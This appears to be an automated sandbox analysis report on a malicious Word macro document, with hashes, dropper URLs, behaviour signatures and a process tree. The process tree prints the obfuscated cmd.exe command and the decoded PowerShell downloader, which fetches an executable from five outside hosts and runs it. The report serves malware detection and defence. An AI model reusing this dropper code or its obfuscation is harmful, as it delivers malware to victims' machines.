Analysis

  • max time kernel
    144s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-06-2022 02:53

General

  • Target

    04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631.doc

  • Size

    126KB

  • MD5

    ffd7ed2ea278afe39daf3b7f6d4819d3

  • SHA1

    e7245488c6048d3a4bb0c7a49cacc1f2145330fb

  • SHA256

    04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631

  • SHA512

    59ea97a02a17c1fe21b30dae6ebe206798943f9a8b245686420e33ac2da46f647000a67e2208eb2f63e4f7a32a7c0c76de65312dd7f9895fc74776e31468c726

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://levifca.com/y0tYhnWQ

exe.dropper

http://mfpvision.com/yAkPNiSmm6

exe.dropper

http://haganelectronics.rubickdesigns.com/C96xSAAy2q

exe.dropper

http://catairdrones.com/sMQ0n8nNun

exe.dropper

http://radio312.com/mp0NHN4cHX

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2028
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1724

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      f2b802b8f524e06c76aec729eaaadb0d

      SHA1

      c9ca80f4658962da1db909c5a8c1ffea11421549

      SHA256

      be93ba89f9354442991ae46e853bb21817038d4ec4f303be4838355165de13d0

      SHA512

      cb99e04e12cdca70c5b557478d8f79d1e15e986050e96809ab7efb1f278ad07f4dbe04f567de8f8617e5900d40842430c53db05eb259cdf7c9d28ec3cfa7acd7

    • memory/1092-62-0x00000000007A3000-0x00000000007A7000-memory.dmp

      Filesize

      16KB

    • memory/1092-57-0x00000000750C1000-0x00000000750C3000-memory.dmp

      Filesize

      8KB

    • memory/1092-54-0x0000000072671000-0x0000000072674000-memory.dmp

      Filesize

      12KB

    • memory/1092-63-0x00000000007A3000-0x00000000007A7000-memory.dmp

      Filesize

      16KB

    • memory/1092-77-0x00000000710DD000-0x00000000710E8000-memory.dmp

      Filesize

      44KB

    • memory/1092-76-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1092-61-0x00000000710DD000-0x00000000710E8000-memory.dmp

      Filesize

      44KB

    • memory/1092-55-0x00000000700F1000-0x00000000700F3000-memory.dmp

      Filesize

      8KB

    • memory/1092-58-0x00000000710DD000-0x00000000710E8000-memory.dmp

      Filesize

      44KB

    • memory/1092-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1444-74-0x000000006AAC0000-0x000000006B06B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-67-0x000000006AAC0000-0x000000006B06B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-68-0x0000000004C30000-0x0000000004D44000-memory.dmp

      Filesize

      1.1MB

    • memory/1444-75-0x000000006AAC0000-0x000000006B06B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-65-0x0000000000000000-mapping.dmp

    • memory/1724-69-0x0000000000000000-mapping.dmp

    • memory/1724-72-0x0000000004C00000-0x0000000004D14000-memory.dmp

      Filesize

      1.1MB

    • memory/1724-73-0x000000006AAC0000-0x000000006B06B000-memory.dmp

      Filesize

      5.7MB

    • memory/1908-64-0x0000000000000000-mapping.dmp

    • memory/2028-60-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

      Filesize

      8KB

    • memory/2028-59-0x0000000000000000-mapping.dmp